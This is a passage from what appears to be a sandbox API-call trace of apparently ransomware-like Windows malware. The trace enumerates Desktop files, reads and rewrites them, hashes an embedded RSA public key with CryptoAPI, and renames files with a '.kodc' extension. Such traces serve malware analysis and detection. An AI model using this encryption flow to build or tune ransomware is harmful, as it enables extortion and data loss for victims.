hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.705] GetCurrentThreadId () returned 0x42c [0097.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695f48 [0097.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.705] GetCurrentThreadId () returned 0x42c [0097.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a688 [0097.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6a0 [0097.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a670 [0097.708] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa4e3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.708] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.708] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.708] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.708] CloseHandle (hObject=0x5cc) returned 1 [0097.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0097.709] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gNI2 7WqYz3wxiIDKTyj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gni2 7wqyz3wxiidktyj.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gNI2 7WqYz3wxiIDKTyj.m4a.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gni2 7wqyz3wxiidktyj.m4a.kodc")) returned 1 [0097.711] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52538370, ftCreationTime.dwHighDateTime=0x1d5bddb, ftLastAccessTime.dwLowDateTime=0x98dce850, ftLastAccessTime.dwHighDateTime=0x1d5bbfa, ftLastWriteTime.dwLowDateTime=0x98dce850, ftLastWriteTime.dwHighDateTime=0x1d5bbfa, nFileSizeHigh=0x0, nFileSizeLow=0x141b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h7MYO.xlsx", cAlternateFileName="H7MYO~1.XLS")) returned 1 [0097.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.711] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h7MYO.xlsx") returned=".xlsx" [0097.711] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h7MYO.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h7myo.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.711] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=82359) returned 1 [0097.712] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.715] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14191, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.715] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.716] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.716] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x141b7, lpOverlapped=0x0) returned 1 [0097.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.717] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.717] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0097.718] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.718] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.718] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.718] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.718] GetLastError () returned 0x0 [0097.718] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.718] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0097.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.718] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.718] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.718] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x141c0) returned 0x9ba4d90 [0097.719] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333ff00 [0097.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a658 [0097.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333ff48 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a670 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6a0 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6b8 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.720] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6a0 | out: hHeap=0x630000) returned 1 [0097.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6b8 | out: hHeap=0x630000) returned 1 [0097.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a6b8 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a6a0 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0097.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6b8 | out: hHeap=0x630000) returned 1 [0097.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6a0 | out: hHeap=0x630000) returned 1 [0097.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.721] GetCurrentThreadId () returned 0x42c [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695fd8 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.722] GetCurrentThreadId () returned 0x42c [0097.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6a0 [0097.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0097.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6b8 [0097.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a688 [0097.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a6d0 [0097.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0097.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6a0 | out: hHeap=0x630000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6a0 [0097.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0097.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6a0 | out: hHeap=0x630000) returned 1 [0097.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | 